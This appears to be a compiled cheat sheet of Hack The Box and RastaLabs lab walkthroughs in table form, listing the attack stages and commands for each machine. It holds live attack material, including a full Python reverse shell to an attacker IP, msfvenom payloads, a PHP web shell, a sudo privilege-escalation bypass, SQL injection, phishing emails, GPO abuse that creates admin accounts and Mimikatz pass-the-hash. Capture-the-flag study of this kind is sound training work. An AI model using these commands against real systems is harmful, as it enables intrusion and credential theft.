| 4  | SMB Enumeration     | Accessing SMB Shares               | `smbclient //cascade.htb/IT -U r.thompson`                     |
| 5  | Log Analysis        | Reviewing Service Logs             | `cat ArkAdRecycleBin.log`                                      |
| 6  | Registry Analysis   | Downloading and Analyzing Registry | `get "VNC Install.reg"` (in smbclient, the filename must be quoted because of the space), then `cat "VNC Install.reg"` |
| 7  | Password Decryption | Decrypting VNC Passwords           | Use online HEX decoder or VNC password decryption tool         |
| 8  | Remote Access       | Using Evil-WinRM                   | `evil-winrm -i cascade.htb -u s.smith -p 'decrypted_password'` |
| 9  | Share Enumeration   | Listing SMB Shares                 | `smbclient //cascade.htb/Audit$ -U s.smith`                    |
| 10 | Database Analysis   | Analyzing SQLite Database          | Open `Audit.db` with a database viewer like EditPlus           |

### Blunder

| ID | Stage                    | Techniques                         | Commands                                                    |
| -- | ------------------------ | ---------------------------------- | ----------------------------------------------------------- |
| 1  | Initial Recon            | Nmap Scanning                      | `nmap -sV -p- -oA blunder.nmap blunder.htb`                 |
| 2  | Web Enumeration          | Fuzzing with Extensions            | `wfuzz -u http://blunder.htb/FUZZ -w list.txt -t 50 --hw 0` |
| 3  | Exploit Identification   | Searchsploit                       | `searchsploit bludit`                                       |
| 4  | Brute Force Attack       | Using Custom Script                | Custom Python script for brute-forcing                      |
| 5  | Exploitation             | Metasploit Framework               | `msfconsole` and use exploit for Bludit CMS                 |
| 6  | Shell Stabilization      | Python TTY Spawn                   | `python3 -c 'import pty; pty.spawn("/bin/bash")'`           |
| 7  | User Privilege Discovery | Checking Sudo Permissions          | `sudo -l`                                                   |
| 8  | Privilege Escalation     | Exploiting Sudo Bug CVE-2019-14287 | `sudo -u#-1 /bin/bash`                                      |

### Worker

| ID | Stage                 | Techniques                       | Commands                                                                         |
| -- | --------------------- | -------------------------------- | -------------------------------------------------------------------------------- |
| 1  | Initial Recon         | Nmap Scanning                    | `nmap -sC -sV 10.10.10.203`                                                      |
| 2  | SVN Enumeration       | SVN Commands                     | `svn help`, `svn list svn://10.10.10.203`                                        |
| 3  | Sub-Domain Discovery  | Adding Sub-Domains to Hosts      | Edit `/etc/hosts` and add sub-domains                                            |
| 4  | SVN Log Analysis      | Viewing SVN Logs                 | `svn log svn://10.10.10.203/`                                                    |
| 5  | SVN Diff Analysis     | Viewing SVN Diffs                | `svn diff -c r2 svn://10.10.10.203`                                              |
| 6  | Azure DevOps Access   | Logging into Azure DevOps        | Use credentials to log into `devops.worker.htb`                                  |
| 7  | Malicious File Upload | Creating and Uploading ASPX File | `msfvenom` to create `payload.aspx` and upload via pull request                  |
| 8  | Meterpreter Shell     | Getting Reverse Shell            | Set up listener with `msfconsole` and navigate to `lens.worker.htb/payload.aspx` |
| 9  | Post-Exploitation     | Meterpreter Commands             | `getuid`, `sysinfo`, `cd /users`, `dir` in meterpreter shell                     |

### Jerry

| ID | Stage            | Techniques                       | Commands                                                                                     |
| -- | ---------------- | -------------------------------- | -------------------------------------------------------------------------------------------- |
| 1  | Reconnaissance   | Nmap Scanning                    | `nmap -sC -sV 10.10.10.95`                                                                   |
| 2  | Access Tomcat    | Default Credentials              | Use default credentials `tomcat:s3cret` to access Apache Tomcat Manager                      |
| 3  | Deploy WAR       | MsfVenom WAR File Creation       | `msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.17 LPORT=4444 -f war > reverse_shell` |
| 4  | Gain Shell       | Netcat Listener                  | `nc -lvnp 4444` then access the deployed WAR file to get a shell                             |
| 5  | Privilege Check  | Whoami Command                   | `whoami` to check the current user privileges                                                |
| 6  | Flag Acquisition | Directory Navigation and Reading | Navigate to `C:\Users\Administrator\Desktop\flags` and read `2 for the price of 1.txt`       |

### Admirer

| ID | Stage                | Techniques                                      | Commands                                                                             |
| -- | -------------------- | ----------------------------------------------- | ------------------------------------------------------------------------------------ |
| 1  | Initial Enumeration  | Nmap Scanning                                   | `nmap -sC -sV -oN nmap/ 10.10.10.187`                                                |
| 2  | Accessing FTP        | Using Found Credentials                         | Use `ftpuser` credentials found in `credentials.txt`                                 |
| 3  | Exploring Web Server | Checking `robots.txt`                           | Access `http://10.10.10.187/robots.txt` to find disallowed entries                   |
| 4  | Downloading Files    | Using FTP to Download Files                     | Download `html.tar.gz` and `dump.sql` from the server                                |
| 5  | Code Analysis        | Reviewing PHP Scripts                           | Analyze `db_admin.php` and `admin_tasks.php` for potential credentials and functions |
| 6  | SSH Access           | Using Credentials for SSH                       | Use `waldo` credentials to access SSH                                                |
| 7  | Privilege Escalation | Analyzing Sudo Permissions                      | Run `sudo -l` to check for allowed commands for `waldo`                              |
| 8  | Exploiting Scripts   | Using `admin_tasks.sh` for Privilege Escalation | Exploit the `SETENV` option in `sudo` to run `admin_tasks.sh` as root                |
| 9  | Gaining Root         | Python Path Hijacking                           | Use `PYTHONPATH` hijacking to get a root shell                                       |

### Laser

### Unbalanced

| ID | Stage               | Techniques                        | Commands                                                                   |
| -- | ------------------- | --------------------------------- | -------------------------------------------------------------------------- |
| 1  | Initial Enumeration | Nmap Scanning                     | `nmap -sC -sV -p- 10.10.10.200 -v --min-rate=10000`                        |
| 2  | Accessing Rsync     | Listing Rsync Modules             | `nc -vn 10.10.10.200 873` followed by `list`                               |
| 3  | Downloading Backups | Using Rsync to Download Files     | `rsync -av rsync://10.10.10.200/conf_backups files`                        |
| 4  | Decrypting Backups  | Decrypting EncFS                  | <p><code>python encfs2john.py /root/hackthebox/machine/unbalanced/files/ > hash</code><br><code>john --wordlist=/usr/share/wordlists/rockyou.txt --progress-every=3 hash</code></p> |
| 5  | Reading Files       | Accessing Decrypted Configuration Files | <p><code>encfsctl export files decrypt</code><br><code>ls decrypt/</code> to view the decrypted files</p>                                                                    |

### SneakyMailer

| ID | Stage                 | Techniques                               | Commands                                                                                                                                                                            |
| -- | --------------------- | ---------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 1  | Information Gathering | Nmap Scanning                            | `nmap -sV -sC -v -p- --min-rate=10000 10.10.10.197`                                                                                                                                 |
| 2  | Subdomain Enumeration | Using `ffuf` for Subdomain Brute-Forcing | `./ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://sneakycorp.htb/ -H "Host: FUZZ.sneakycorp.htb"`                                         |
| 3  | Email Collection      | Extracting Emails from Web Page          | Manually visit `http://sneakycorp.htb/team.php` and extract emails to `mails.txt`                                                                                                   |
| 4  | Email Engagement      | Sending Emails with `swaks`              | `while read mail; do swaks --to $mail --from it@sneakymailer.htb --header "Subject: Credentials / Errors" --body "goto http://10.10.14.4/" --server 10.10.10.197; done < mails.txt` |
| 5  | Credential Harvesting | Netcat Listener                          | `nc -lvp 80` to listen for incoming connections                                                                                                                                     |
| 6  | Accessing SMTP        | Using `evolution` to Access SMTP         | `apt-get install evolution` and configure with SMTP server `10.10.10.197` and email `paulbyrd@sneakymailer.htb`                                                                     |
| 7  | Exploring Sent Items  | Checking Sent Emails                     | Check sent items for any useful information after accessing the SMTP server                                                                                                         |

### Notebook

| ID | Stage                       | Techniques                | Commands                                                                 |
| -- | --------------------------- | ------------------------- | ------------------------------------------------------------------------ |
| 1  | Reconnaissance              | Web Server Analysis       | Manual inspection of web application on port 80/tcp                      |
| 2  | Vulnerability Analysis      | JWT Token Analysis        | Decode JWT token, notice "kid" parameter pointing to an internal address |
| 3  | Exploitation                | Custom JWT Token Creation | Develop `jwt-token.py` to generate a custom JWT token                    |
| 4  | Administration Panel Access | Access with JWT Token     | Use generated JWT token to access the admin panel                        |
| 5  | Web Shell Upload            | PHP File Upload           | Upload a malicious PHP file as allowed by the admin panel                |
| 6  | Reverse Shell               | Exploit PHP File          | Get a reverse shell as `www-data` from the uploaded PHP file             |
| 7  | Post-Exploitation           | User Access               | Use `home.tar.gz` from `/var/backups/` to login as user `noah` with SSH  |
| 8  | Privilege Escalation        | Docker Exploitation       | Use `docker exec -it webappdev01*` as administrator                      |
| 9  | Root Access                 | CVE-2019-5736 Exploit     | Modify and run CVE-2019-5736 exploit to get root access                  |

### AI

| ID | Stage                | Techniques              | Commands                                                                                                         |
| -- | -------------------- | ----------------------- | ---------------------------------------------------------------------------------------------------------------- |
| 1  | Reconnaissance       | Nmap Scan               | `nmap -sV -sT -sC -o nmapinitial ai.htb`                                                                         |
| 2  | Web Enumeration      | Manual Inspection       | Inspect web application on port 80/tcp, hover over logo for menu                                                 |
| 3  | Web Enumeration      | Gobuster Directory Scan | `gobuster dir -u http://ai.htb/ -w /usr/share/wordlists/dirb/common.txt`                                         |
| 4  | Audio File Handling  | Convert MP3 to WAV      | `ffmpeg -i input.mp3 output.wav`                                                                                 |
| 5  | SQL Injection        | Extract Database Name   | Audio payload: "one open single quote union select database open parenthesis close parenthesis comment database" |
| 6  | SQL Injection        | Enumerate Table Names   | Audio payload: "one open single quote union select test from test comment database"                              |
| 7  | SQL Injection        | Enumerate Users Table   | Audio payload: "one open single quote union select test from users comment database"                             |
| 8  | SQL Injection        | Extract Passwords       | Audio payload: "one open single quote union select password from users comment database"                         |
| 9  | Privilege Escalation | Exploit JDWP Service    | Use `jdwp-shellifier.py` with reverse shell payload                                                              |

### ServMon

| ID | Stage                 | Techniques                                | Commands                                                                              |
| -- | --------------------- | ----------------------------------------- | ------------------------------------------------------------------------------------- |
| 1  | Initial Recon         | Nmap Scan                                 | `nmap -sC -sV -sS 10.10.10.184`                                                       |
| 2  | FTP Enumeration       | Anonymous FTP Access                      | `ftp 10.10.10.184` (then use `ls`, `cd`, `get` commands to interact)                  |
| 3  | File Analysis         | Reviewing Downloaded Files                | `get "Notes to do.txt"`, `get "Confidential.txt"`                                     |
| 4  | Web Enumeration       | Enumerate Web Pages                       | Manual inspection of web application on port 80/tcp                                   |
| 5  | Exploitation          | Exploit NVMS-1000 (CVE-2019-2085)         | Use CVE details from Exploit-DB and Burp Suite to exploit                             |
| 6  | Credential Access     | Extract Passwords via Directory Traversal | `GET /../../../../../../../../../../../../windows/Users/Nadine/Desktop/Passwords.txt` |
| 7  | Brute Force           | SSH Brute Force with Hydra                | `hydra -L users.txt -P pass.txt 10.10.10.184 ssh`                                     |
| 8  | SSH Access            | Login via SSH                             | SSH login with found credentials                                                      |
| 9  | Privilege Escalation  | Exploit NSClient++ 0.5.2.35               | Follow CVE details from Exploit-DB to exploit NSClient++                              |
| 10 | Local Port Forwarding | Port Forwarding via SSH                   | Use SSH port forwarding to interact with local services                               |

### OpenAdmin

| ID | Stage                   | Techniques                | Commands                                                                          |
| -- | ----------------------- | ------------------------- | --------------------------------------------------------------------------------- |
| 1  | Recon                   | Nmap Scan                 | `nmap -sC -sV -sS 10.10.10.171`                                                   |
| 2  | Web Enumeration         | Manual Visit, Gobuster    | Visit `http://10.10.10.171`, `gobuster dir -u http://10.10.10.171/ -w common.txt` |
| 3  | Exploitation            | OpenNetAdmin RCE          | Use exploit from `amriunix/ona-rce` repository                                    |
| 4  | Initial Foothold        | Reverse Shell             | Gain reverse shell as `www-data`                                                  |
| 5  | User Access             | Password Reuse            | SSH as `jimmy` with reused credentials                                            |
| 6  | Internal Service Access | Port Forwarding           | Forward port 52846 to local machine and access internal service                   |
| 7  | Privilege Escalation    | Cracking Hash             | Crack `sha512` hash to obtain `jimmy`'s password                                  |
| 8  | SSH Key Access          | Decrypt SSH Key           | Use `ssh2john` and `john` to decrypt Joanna's SSH key                             |
| 9  | Root Access             | Sudo Exploitation of Nano | Use `nano` with sudo to gain root shell based on GTFOBins                         |

### Magic

| ID | Stage                   | Techniques                      | Commands                                                                                                                                                                                                                                                                                 |
| -- | ----------------------- | ------------------------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 1  | Nmap Scanning           | Nmap Scan                       | `nmap -sC -sV -sS -T4 10.10.10.185`                                                                                                                                                                                                                                                      |
| 2  | Enumerating Web Page    | Manual Visit                    | Visit `http://10.10.10.185`                                                                                                                                                                                                                                                              |
| 3  | Bypass Login            | SQL Injection                   | Use `'or''='` for both username and password                                                                                                                                                                                                                                             |
| 4  | Uploading Shell         | Bypass File Upload Restrictions | `exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' me.jpg`                                                                                                                                                                                                                |
| 5  | Gaining Access          | Reverse Shell                   | `http://10.10.10.185/images/uploads/me.php.jpg?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.43",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'` |
| 6  | Enumerating Credentials | Reading Configuration Files     | `cat /var/www/Magic/db.php5`                                                                                                                                                                                                                                                             |
| 7  | Switching User Shell    | User Switching                  | `su theseus` with password `iamkingtheseus`                                                                                                                                                                                                                                              |
| 8  | Find SUID files         | Privilege Escalation            | Not specified in the summary                                                                                                                                                                                                                                                             |
| 9  | Getting ROOT            | Exploitation                    | Not specified in the summary                                                                                                                                                                                                                                                             |

### Spectra

| ID | Stage                | Techniques                      | Commands                                                                          |
| -- | -------------------- | ------------------------------- | --------------------------------------------------------------------------------- |
| 1  | Recon                | Nmap Scan                       | `nmap -sC -sV -sS -T4 10.10.10.229`                                               |
| 2  | Web Enumeration      | Manual Visit, Gobuster          | Visit `http://10.10.10.229`, `gobuster dir -u http://10.10.10.229/ -w common.txt` |
| 3  | Web Enumeration      | Inspect Source Code             | Inspect source code of `http://spectra.htb/wp-config.php.save`                    |
| 4  | Credential Access    | Username and Password Discovery | Found credentials: username `administrator`, password `devteam01`                 |
| 5  | Web Exploitation     | WordPress Admin Login           | Login to WordPress admin panel with found credentials                             |
| 6  | Reverse Shell        | Metasploit Reverse Shell        | Use `msfconsole` and `exploit/unix/webapp/wp_admin_shell_upload`                  |
| 7  | Privilege Escalation | Sudo Privileges Exploitation    | Use `sudo` with `initctl` for privilege escalation                                |
| 8  | Privilege Escalation | Editing Service Configuration   | Edit `/etc/init/test.conf` to add `chmod +s /bin/bash`                            |
| 9  | Privilege Escalation | Gaining Root Access             | Execute `/bin/bash -p` to spawn a shell with root privileges                      |

### Sink

| ID | Stage             | Techniques                     | Commands                                                                         |
| -- | ----------------- | ------------------------------ | -------------------------------------------------------------------------------- |
| 1  | Recon             | Nmap Scan                      | `nmap -sC -sV -p- 10.10.10.225`                                                  |
| 2  | Web Enumeration   | Inspect Source Code            | Inspect source code for CVE-2019-18277 vulnerability                             |
| 3  | Exploitation      | HTTP Request Smuggling         | Edit and send crafted HTTP requests to exploit CVE-2019-18277                    |
| 4  | Post-Exploitation | Capture Admin Cookie           | Reload the home page to capture the admin cookie after the exploit               |
| 5  | Privilege Access  | Use Credentials Found in Notes | Use credentials from notes to access different services (Chef, Dev Node, Nagios) |
| 6  | Privilege Access  | Access Gitea Service           | Log in to Gitea service with found credentials                                   |
| 7  | Privilege Access  | Find SSH Key for User          | Find `id_rsa_marcus` key for user Marcus on Gitea service                        |
| 8  | Privilege Access  | Use SSH Key to Gain Access     | Use `id_rsa_marcus` to SSH into the machine as Marcus                            |

### Ready

| ID | Stage                | Techniques                          | Commands                                                                                     |
| -- | -------------------- | ----------------------------------- | -------------------------------------------------------------------------------------------- |
| 1  | Recon                | Nmap Scan                           | `nmap -sC -sV -p- 10.10.10.220`                                                              |
| 2  | Web Enumeration      | GitLab Sign In Page                 | Inspect GitLab sign in page for vulnerabilities                                              |
| 3  | Exploitation         | GitLab 11.4.7 Remote Code Execution | Follow steps from LiveOverflow video & article for RCE                                       |
| 4  | Reverse Shell        | Gain Reverse Shell                  | Use the payload from the video to gain a reverse shell                                       |
| 5  | Post-Exploitation    | Find Credentials                    | Locate `gitlab.rb` in `/opt/backup` to find SMTP password                                    |
| 6  | Privilege Access     | Use Found Credentials               | Use found SMTP password to change user and gain root access in the docker container          |
| 7  | Privilege Escalation | Escaping Docker Container           | Follow steps from the "Escaping Docker Privileged Containers" article to escalate privileges |
| 8  | Root Access          | SSH Key                             | Use the provided `id_rsa` key to SSH into the root account                                   |

### Pivotapi

| ID | Stage             | Techniques                               | Commands                                                                         |
| -- | ----------------- | ---------------------------------------- | -------------------------------------------------------------------------------- |
| 1  | Recon             | Nmap Scan                                | `nmap -sC -sV -oA nmap/result 10.10.10.240`                                      |
| 2  | FTP Enumeration   | Anonymous FTP Access                     | `ftp -pi 10.10.10.240` followed by `ls` and `mget *` to download files           |
| 3  | Metadata Analysis | ExifTool Analysis                        | `exiftool *`                                                                     |
| 4  | Kerberos Attack   | GetNPUsers.py Kerberos Preauthentication | `GetNPUsers.py -dc-ip 10.10.10.240 -no-pass -usersfile user.lst LicorDeBellota/` |
| 5  | Hash Cracking     | John the Ripper                          | `john hash -w=/usr/share/wordlists/rockyou.txt` to crack Kerberos hash           |

### Openkeys

| ID | Stage                | Techniques                | Commands                                                                                  |
| -- | -------------------- | ------------------------- | ----------------------------------------------------------------------------------------- |
| 1  | Initial Scanning     | Nmap Scan                 | `nmap -sC -sV -oN nmap 10.10.10.199`                                                      |
| 2  | Web Enumeration      | Directory Scan            | `dirsearch -u 10.10.10.199 -w /opt/common.txt -e *`                                       |
| 3  | Exploitation         | Vulnerability in OpenBSD  | Use `-schallenge` as a username to bypass authentication                                  |
| 4  | SSH Key Discovery    | Cookie Modification       | Modify the cookie to include a valid username to reveal SSH keys                          |
| 5  | SSH Access           | Use Discovered SSH Key    | `ssh -i id_rsa jennifer@10.10.10.199`                                                     |
| 6  | Privilege Escalation | Local Exploit for OpenBSD | `nano authroot; chmod +x authroot; ./authroot` to exploit CVE-2019-19520 / CVE-2019-19522 |

### Oouch

| ID | Stage                | Techniques                   | Commands                                                      |
| -- | -------------------- | ---------------------------- | ------------------------------------------------------------- |
| 1  | Reconnaissance       | Nmap Scan                    | `nmap -sV -sC -T4 -p- oouch.htb`                              |
| 2  | Web Enumeration      | Directory Scan               | `gobuster dir -u http://oouch.htb:5000/ -w big.txt`           |
| 3  | OAuth Exploitation   | SSRF in Contact Page         | Use SSRF to link account with admin                           |
| 4  | Access Token         | Intercept Request with Burp  | Intercept `/oauth/connect` request to get token-code          |
| 5  | SSH Key Discovery    | Accessing SSH Private Keys   | Access API to retrieve SSH keys                               |
| 6  | Docker Exploitation  | Exploit Docker UWSGI Service | Log into Docker and exploit UWSGI service running as www-data |
| 7  | Privilege Escalation | Exploit Dbus                 | Exploit Dbus to get a shell as root and obtain root.txt       |

### Fuse

| ID | Stage                | Techniques                     | Commands                                                                                            |
| -- | -------------------- | ------------------------------ | --------------------------------------------------------------------------------------------------- |
| 1  | Recon                | Nmap scan                      | `nmap -sV -sC -v -T4 -oA scans/nmap.full -p- fuse.htb`                                              |
| 2  | Enumeration          | Enumerating SMB, HTTP, and RPC | `enum4linux fuse.htb`, `smbclient -L fuse.htb`, `rpcclient -U FABRICORP\\tlavel 10.10.10.193`       |
| 3  | Exploitation         | Password Spraying              | `msf > use auxiliary/scanner/smb/smb_login`, `medusa -h fuse.htb -U users.txt -P wordlist -M smbnt` |
| 4  | Privilege Escalation | Abusing SeLoadDriverPrivilege  | Compiling files with Visual Studio, using `eoploaddriver.exe` and `ExploitCapcom.exe`               |
| 5  | Post-Exploitation    | Accessing Admin Shell          | `evil-winrm -u Administrator -H <hash> -i fuse.htb`                                                 |

### Cereal

1. **Reconnaissance**:
   * **Techniques**: Port scanning with Nmap, adding domain names to the `/etc/hosts` file.
   * **Commands**: `nmap -sC -sV -oA /result 10.10.10.217`, `cat nmap/result.nmap`.
2. **Enumeration**:
   * **Techniques**: Using Gobuster to find directories, dumping `.git` directory with GitTools.
   * **Commands**: `gobuster dir -u http://cereal.htb -w wordlist`, `bash gitdumper.sh http://source.cereal.htb/.git/ /root/Desktop/HTB/Cereal/dump/`.
3. **Exploitation**:
   * **Techniques**: Exploiting Cross-site Scripting (XSS) to trigger deserialization, creating JWT tokens, uploading a shell.
   * **Commands**: `python3 jwt_tool.py -b -S hs256 -p 'secret'`, `bash extractor.sh ../../dump/ /root/Desktop/HTB/Cereal/all_dump/`.
4. **Gaining Access**:
   * **Techniques**: Uploading and executing a shell, using Python scripts to automate tasks.
   * **Commands**: `python3 -m http.server 80`, `nc -nvlp 9001`, `python3 dedsec.py`, `curl -k https://source.cereal.htb/uploads/shell.aspx`.
5. **Privilege Escalation**:
   * **Techniques**: Port forwarding, exploiting `SeImpersonatePrivilege` with JuicyPotato, using GraphQL for SSRF.
   * **Commands**: `msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.6 LPORT=9003 -f exe -o ded.exe`, `curl http://10.10.14.6/ded.exe -o C:\temp\ded.exe`, `nc -nvlp 1337`.
6. **Post-Exploitation**:
   * **Techniques**: Maintaining access, executing reverse shells.
   * **Commands**: `.\GenericPotato.exe -p "C:\temp\nc64.exe" -a "10.10.14.6 1337 -e powershell" -e HTTP -l 8889`.

### Bucket

| ID | Stage                | Techniques                                                              | Commands                                                                                                  |
| -- | -------------------- | ----------------------------------------------------------------------- | --------------------------------------------------------------------------------------------------------- |
| 1  | Recon                | Nmap scan to find open ports                                            | `nmap -sC -sV -oA /result 10.10.10.212`                                                                   |
| 2  | Enumeration          | Gobuster to find directories                                            | `gobuster dir -u http://s3.bucket.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt`   |
| 3  | AWS Configuration    | Configure AWS CLI                                                       | `aws configure`                                                                                           |
| 4  | Data Extraction      | List tables and contents in DynamoDB                                    | `aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/ --no-sign-request`                         |
|    |                      |                                                                         | `aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ --no-sign-request`             |
| 5  | Exploitation         | Upload PHP reverse shell to the server                                  | `aws --endpoint-url http://s3.bucket.htb/ s3 cp /root/Desktop/HTB/Bucket/shell.php s3://adserver/images/` |
| 6  | Privilege Escalation | Port forwarding and exploiting a web service for code execution as root | `ssh -L 8000:127.0.0.1:8000 roy@10.10.10.212`                                                             |
|    |                      | Create and trigger payload to get root's `id_rsa`                       | `curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v`                                           |

### Armageddon

| ID | Stage                | Techniques                                     | Commands                                                                                  |
| -- | -------------------- | ---------------------------------------------- | ----------------------------------------------------------------------------------------- |
| 1  | Recon                | Nmap scanning                                  | `nmap -sC -sV -oA nmap/result 10.10.10.233`                                               |
| 2  | Exploitation         | Drupalgeddon 2 Forms API Property Injection    | `msf6 > use exploit/unix/webapp/drupal_drupalgeddon2` followed by setting options and run |
| 3  | Gaining Access       | Finding credentials in settings.php            | Inspect `/var/www/html/sites/default/settings.php` for MySQL credentials                  |
| 4  | Database Access      | Accessing MySQL database                       | `mysql -u drupaluser -p -e 'show databases;'`                                             |
| 5  | Data Exfiltration    | Dumping usernames and password hashes          | `mysql -u drupaluser -p -D drupal -e 'select name,pass from users;'`                      |
| 6  | Password Cracking    | Using John the Ripper to crack password hashes | `john hash -w=/usr/share/wordlists/rockyou.txt`                                           |
| 7  | Access with SSH      | SSH into the machine with cracked credentials  | `ssh brucetherealadmin@10.10.10.233`                                                      |
| 8  | Privilege Escalation | Exploiting snapd (`dirty_sock` exploit)        | Use the `dirty_sock` exploit to escalate privileges                                       |
| 9  | Capture Flag         | Reading user and root flags                    | `cat user.txt` and `cat root.txt`                                                         |

### Traceback

| ID | Stage                       | Techniques                                      | Commands                                                                   |
| -- | --------------------------- | ----------------------------------------------- | -------------------------------------------------------------------------- |
| 1  | Recon                       | Nmap scanning                                   | `nmap -sC -sV 10.10.10.181`                                                |
| 2  | Enumeration                 | Source code analysis, Gobuster                  | `gobuster dir -w shells.txt -u http://10.10.10.181`                        |
| 3  | Exploitation                | Accessing web shell                             | Navigate to `http://10.10.10.181/smevk.php`, login with default creds      |
| 4  | Access                      | SSH key upload                                  | `ssh-keygen`, upload `id_rsa.pub` as `authorized_keys`                     |
| 5  | Initial Access              | SSH as webadmin                                 | `ssh webadmin@10.10.10.181 -i id_rsa`                                      |
| 6  | Privilege Escalation (User) | Using `luvit` to execute commands as `sysadmin` | `sudo -u sysadmin /home/sysadmin/luvit`, then `os.execute("/bin/bash -i")` |
| 7  | Capture User Flag           | Reading user flag                               | `cat /home/sysadmin/user.txt`                                              |
| 8  | Privilege Escalation (Root) | Modifying `00-header` for command execution     | `echo "id" >> /etc/update-motd.d/00-header`                                |
| 9  | Capture Root Flag           | Reading root flag                               | `echo "cat /root/root.txt" >> /etc/update-motd.d/00-header`                |

### Rastalab1

| ID | Stage            | Techniques       | Commands                                                        |
| -- | ---------------- | ---------------- | --------------------------------------------------------------- |
| 1  | Initial Scanning | Masscan          | `masscan -p 80,135,139,445,443 -sT 10.10.110.0/24 -e tun0`      |
| 2  | Host Discovery   | Nmap Scan        | `nmap` scan of 10.10.110.10 and 10.10.110.254 (specific options not provided) |
| 3  | Domain Discovery | CrackMapExec     | `crackmapexec` against 10.10.110.10 and 10.10.110.254 (specific options not provided) |
| 4  | Network Mapping  | Host Enumeration | Hostnames and IPs: DC01 - 10.10.120.1, FS01 - 10.10.120.5, etc. |

### Rastalab2

| ID | Stage             | Techniques                | Commands                                                                    |
| -- | ----------------- | ------------------------- | --------------------------------------------------------------------------- |
| 1  | Reconnaissance    | Outlook Version Discovery | Check outlook version on port 443 at 10.10.110.254                          |
| 2  | Enumeration       | Web Page Analysis         | Analyze Rastalabs website on 10.10.110.10 on port 80                        |
| 3  | User Profiling    | Social Media Analysis     | Review Amber Hope's LinkedIn and Instagram profiles                         |
| 4  | Credential Access | Brute Force               | Use Metasploit `auxiliary/scanner/http/owa_login` to brute force            |
| 5  | Access            | Outlook Login             | Login with credentials 'RLAB\ahope' : 'Labrador8209'                        |
| 6  | Flag Discovery    | Task Navigation           | Navigate to tasks in Outlook to find the flag `RASTA{ph15h1n6_15_h4rdc0r3}` |

### Rastalab3

| ID | Stage                 | Techniques                  | Commands                                                                                            |
| -- | --------------------- | --------------------------- | --------------------------------------------------------------------------------------------------- |
| 1  | Credential Dumping    | Vault Credential Extraction | `Get-ChildItem C:\Users\epugh\AppData\Local\Microsoft\Credentials\ -force`                          |
| 2  | Credential Dumping    | Mimikatz Execution          | `sekurlsa::dpapi`, `dpapi::cred /in:C:\users\epugh\AppData\Local\Microsoft\Credentials\<HASH>`      |
| 3  | Credential Decryption | DPAPI Master Key Usage      | `dpapi::cred /in:C:\users\epugh\AppData\Local\Microsoft\Credentials\<HASH> /masterkey:<MASTER_KEY>` |
| 4  | Remote Desktop        | Port Forwarding             | `portfwd add -L 10.10.14.83 -r 10.10.122.15 -l 3389 -p 3389`                                        |
| 5  | Remote Desktop        | Remmina Configuration       | Import `.rdp` file, change host, export to `.rdp` file                                              |
| 6  | Remote Desktop        | FreeRDP Connection          | `xfreerdp sql.rdp /u:epugh_adm /d:rastalabs.local`                                                  |
| 7  | Flag Discovery        | Task Navigation             | Flag found: `RASTA{c00k1n6_w17h_645_n0w}`                                                           |

### Rastalab4

| ID | Stage                 | Techniques                          | Commands                                                                                                                                      |
| -- | --------------------- | ----------------------------------- | --------------------------------------------------------------------------------------------------------------------------------------------- |
| 1  | RDP Access            | Remote Desktop Protocol             | Logged in to web01 (10.10.110.10) and took RDP of sql01 (10.10.122.15) using `epugh_adm` creds                                                |
| 2  | GPO Enumeration       | Group Policy Object Enumeration     | `Get-NetGPO`                                                                                                                                  |
| 3  | Group Membership      | Group Membership Checking           | `net user epugh_adm /domain`                                                                                                                  |
| 4  | GPO Permission Find   | GPO Permission Enumeration          | `Get-NetGPO -ComputerName fs01.rastalabs.local`                                                                                               |
| 5  | GPO Abuse             | Group Policy Object Abuse           | `New-GPOImmediateTask -TaskName gop12i -GPODisplayName "Test GPO" -CommandArguments 'net user gopikrishna Ramco@12345 /add' -force`           |
| 6  | Add to Administrators | Adding User to Administrators Group | `New-GPOImmediateTask -TaskName gopi131 -GPODisplayName "Test GPO" -CommandArguments 'net localgroup Administrators gopikrishna /add' -force` |
| 7  | Clean Up              | Group Policy Object Task Removal    | `New-GPOImmediateTask -Remove -Force -GPODisplayName "Test GPO"`                                                                              |
| 8  | File Permissions      | Modifying File Access Control Lists | `icacls flag.txt /grant administrators:F`                                                                                                     |
| 9  | Flag Discovery        | Retrieving Sensitive Information    | Flag found: `RASTA{6p0_4bu53_15_h4rdc0r3}`                                                                                                    |

### Rastalab5

| ID | Stage           | Techniques                   | Command                                                                                        |
| -- | --------------- | ---------------------------- | ---------------------------------------------------------------------------------------------- |
| 1  | RDP Access      | Remote Desktop Protocol      | Logged in to web01 (10.10.110.10) and took RDP of sql01 (10.10.122.15) using `epugh_adm` creds |
| 2  | SQL Interaction | SQL Server Management Studio | Start SQL Management Studio, connect via Windows authentication, query Umbraco database        |
| 3  | Data Extraction | SQL Query Execution          | `SELECT TABLE_NAME FROM umbraco.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'`     |
| 4  | Flag Discovery  | SQL Data Retrieval           | `select * from Flag` which revealed the flag `RASTA{d474b4535_4r3_u5u4lly_1n73r3571n6}`        |

### Rastalab6

| ID | Stage              | Techniques                    | Command                                                                                                                                                                    |
| -- | ------------------ | ----------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 1  | RDP Access         | Remote Desktop Protocol       | Logged in to web01 (10.10.110.10) and took RDP of sql01 (10.10.122.15) using `epugh_adm` creds                                                                             |
| 2  | Credential Dumping | Invoke Mimikatz               | Run `p0wnedshell.exe` with admin cmd, option 4, invoke mimikatz to get the NTLM hash of `rweston_da`                                                                       |
| 3  | Pass-the-Hash      | Mimikatz Pass-the-Hash        | `sekurlsa::pth /user:rweston_da /domain:rastalabs.local /ntlm:3ff61fa259deee15e4042159d7b832fa`                                                                            |
